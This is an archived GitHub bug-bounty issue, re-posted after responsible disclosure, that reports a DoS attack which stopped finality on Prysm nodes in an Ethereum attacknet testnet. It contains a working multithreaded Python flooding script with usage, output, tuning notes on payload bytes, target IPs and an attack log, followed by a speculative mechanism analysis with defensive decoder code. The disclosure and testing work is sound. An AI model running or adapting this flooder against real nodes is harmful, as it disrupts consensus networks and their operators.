This repository has been archived by the owner on Nov 20, 2021. It is now read-only.

[prysm-attack-0 Reward] DoS Attack on Prysm Stops Finality (RE-POST) #12

Closed
jrhea opened this issue Aug 6, 2020 · 0 comments

Quick Note

The success of this attack was due to a 9-year-old bug in the Go standard library. During the "post-mortem", @protolambda, @prestonvanloon, @raulk and I uncovered this bug and opted to responsibly disclose the details to the golang security team. See the link below for more details:

https://groups.google.com/forum/#!msg/golang-announce/NyPIaucMgXo/GdsyQP6QAAAJ

As a part of the responsible disclosure process, I opted to delete this issue until the vulnerability could be fixed and a security patch released. The following is the original description of the attack (unaltered). Enjoy!

Description

Prysm nodes are vulnerable to a DoS attack that prevents them from participating in consensus.

Attack scenario

Three out of four Prysm nodes were targeted by two AWS t2.small machines with a sustained DoS attack.

Impact

The effect of the DoS attack on the attacknet was a prolonged loss of finality; however, the network was able to recover to a healthy state within a few epochs once the attack stopped. The nodes under attack showed high CPU usage, a large amount of outbound traffic, and trouble finding peers in subnets. One node's local clock also drifted, which caused issues importing blocks.

Details

Attack Procedure

This is the code that the two machines ran to prevent finality on the attacknet:

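#!/usr/bin/python3
import threading
import socket
import time
import sys

def worker(id, ip, port):
    # Each worker loops forever: connect, send one large payload,
    # hold the connection open, then close it and start over.
    while True:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        print("Worker {} connected".format(id))
        packet = bytes([255] * 65536)  # 65536 bytes of 0xFF
        sock.send(packet)
        time.sleep(20)  # acts as a rate limiter (see the note below)
        sock.close()

if __name__ == "__main__":
    # Arguments: [IP] [PORT] [NUM_THREADS]
    ip = sys.argv[1]
    port = int(sys.argv[2])
    num_threads = int(sys.argv[3])

    # Start one worker thread per requested connection.
    threads = []
    for i in range(num_threads):
        thread = threading.Thread(target=worker, args=(i, ip, port))
        threads.append(thread)
        thread.start()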

The code is run as follows:

./prysm_attack.sh [IP] [PORT] [NUM_THREADS]

Here is some sample output from the attack run:

$ ./prysm_attack.sh  3.236.241.28 9000 500
Worker 0 connected
Worker 1 connected
Worker 2 connected
Worker 3 connected
Worker 4 connected
Worker 5 connected
Worker 6 connected
Worker 7 connected
Worker 8 connected
Worker 9 connected
Worker 10 connected
...
Worker 499 connected

To execute the attack, I targeted the following IP addresses with three processes: two processes on one machine and one process on the other.

18.183.12.240
3.127.134.103
34.237.53.47

Each process spawned 500 threads, each of which enters an infinite loop that performs the following steps:

  1. connect to the Prysm node
  2. send a 64 KiB (65,536-byte) payload

Note: the attack definitely works with payloads of 0xFF, 0xFE, ... bytes, but 0x00 causes Prysm to disconnect

  3. sleep for 20 seconds, then close the connection

Note: the sleep time acts as a rate limiter and is somewhat arbitrary, but experimentally it was lower than the Prysm node's timeout that I observed when using netcat.
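The issue does not say why 0xFF keeps the connection open while 0x00 does not. One property that separates the two bytes, offered here only as an assumption about the mechanism, is how they behave at the start of an unsigned varint (LEB128) length prefix: a byte with the high bit set means "more bytes follow", while 0x00 terminates the value immediately. The sketch below shows that difference with a bounded decoder. The name `read_uvarint` and its `max_bytes` parameter are illustrative and are not taken from Prysm or the Go standard library.

```python
def read_uvarint(data: bytes, max_bytes: int = 10):
    """Decode one unsigned LEB128 varint from the start of `data`.

    Returns (value, bytes_consumed). Raises ValueError if no terminating
    byte (high bit clear) appears within the first `max_bytes` bytes.
    A 64-bit value never needs more than 10 bytes, hence the default cap.
    """
    value = 0
    shift = 0
    for i, b in enumerate(data[:max_bytes]):
        value |= (b & 0x7F) << shift   # low 7 bits carry the payload
        if b & 0x80 == 0:              # high bit clear: last byte of the varint
            return value, i + 1
        shift += 7
    raise ValueError("no terminating byte within the first %d bytes" % max_bytes)


if __name__ == "__main__":
    # 0x00 is a complete varint (value 0) after a single byte.
    print(read_uvarint(b"\x00"))

    # A run of 0xFF never terminates; a bounded reader gives up after max_bytes.
    try:
        read_uvarint(bytes([255] * 65536))
    except ValueError as exc:
        print("rejected:", exc)
```

A reader without the `max_bytes` cap would keep consuming the 0xFF stream for as long as the peer keeps sending it, which is consistent with the behaviour observed above but is not confirmed by this report.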

When developing this attack, the first thing I attempted to do was use the same command that crashed Teku. Unfortunately, sending output from /dev/zero caused Prysm to immediately disconnect. Eventually, I found other payloads that would allow the connection to stay open (see above), but sending a large number of small packets (like I did to Teku) didn't seem as effective on Prysm. I switched to Python so I could tune the ratio better and found that a smaller number of large packets was more effective against Prysm.
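For a sense of scale, the parameters reported above put an upper bound on the load each attacking process could offer. The arithmetic below is a rough sketch that assumes every `send` delivers the full payload and that connection setup time is negligible, so real figures would be lower. The constant and function names are illustrative.

```python
PAYLOAD_BYTES = 65536        # bytes([255] * 65536) in the attack script
SLEEP_SECONDS = 20           # pause per loop iteration
THREADS_PER_PROCESS = 500    # NUM_THREADS used in the sample run
PROCESSES = 3                # three processes across the two machines


def max_bytes_per_second(threads, payload=PAYLOAD_BYTES, period=SLEEP_SECONDS):
    """Upper bound on bytes sent per second by `threads` looping workers."""
    return threads * payload / period


def max_connections_per_second(threads, period=SLEEP_SECONDS):
    """Upper bound on new connections opened per second."""
    return threads / period


per_process = max_bytes_per_second(THREADS_PER_PROCESS)
total = per_process * PROCESSES
connections_per_second = max_connections_per_second(THREADS_PER_PROCESS)

if __name__ == "__main__":
    print("per process: %.1f MB/s, %.0f new connections/s"
          % (per_process / 1e6, connections_per_second))
    print("all processes: %.1f MB/s" % (total / 1e6))
```

Under these assumptions each process sends at most about 1.6 MB/s over roughly 25 new connections per second, which is a modest load for two t2.small machines.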

[Image: Bytes-out]

[Image: Packets-out]

Keep in mind that the goal here was just to take down the network, so the attack was designed using a symptomatic approach (i.e. trial and error) with little regard for root cause analysis. A proper analysis would have taken a lot more time: isolating runs, documenting them, and comparing performance to other clients.

One important thing to note is that this attack does NOT seem to be effective against Lighthouse.

Attack Log

The attack lasted from Epoch 1843 to Epoch 1864. I should have stopped at Epoch 1860, but the Beacon Chain Explorer for the Prysm Attacknet became unresponsive 1 slot before Epoch 1860. As a result, I had to start a local Prysm node to verify that the attack was successful. By the time the node had synced, the Beacon Chain Explorer was back online and the attack had lasted over 20 epochs.
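To translate the epoch range into wall-clock time, the sketch below assumes the attacknet used the mainnet spec values of 32 slots per epoch and 12 seconds per slot. The report does not state the attacknet's configuration, so treat both constants as assumptions.

```python
SLOTS_PER_EPOCH = 32     # assumed: mainnet spec value
SECONDS_PER_SLOT = 12    # assumed: mainnet spec value


def epochs_to_seconds(epochs, slots_per_epoch=SLOTS_PER_EPOCH,
                      seconds_per_slot=SECONDS_PER_SLOT):
    """Wall-clock duration of `epochs` epochs, in seconds."""
    return epochs * slots_per_epoch * seconds_per_slot


attack_epochs = 1864 - 1843                      # 21 epochs
attack_seconds = epochs_to_seconds(attack_epochs)

if __name__ == "__main__":
    print("%d epochs = %d s = %.1f min"
          % (attack_epochs, attack_seconds, attack_seconds / 60))
```

With those values, 21 epochs correspond to 8,064 seconds, or a little over two hours.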

Here are some screenshots from https://prysm-attack-0.beaconcha.in/ at the end of the attack:

[Image: participation-rate]

[Image: network-deadness]

[Image: blocks]

Here is a screenshot of my local node showing that finality was prevented for more than 16 epochs:

[Image: victory]

Recovery

Prysm's recovery from the attack was interesting to watch. Here are some screenshots from https://prysm-attack-0.beaconcha.in/ after the network recovered:

[Image: participation-rate-recovery]

[Image: epochs-recovery]

Here is a screenshot of my local node showing that Prysm recovered about 2 epochs after the attack ended:

[Image: recovery-log]
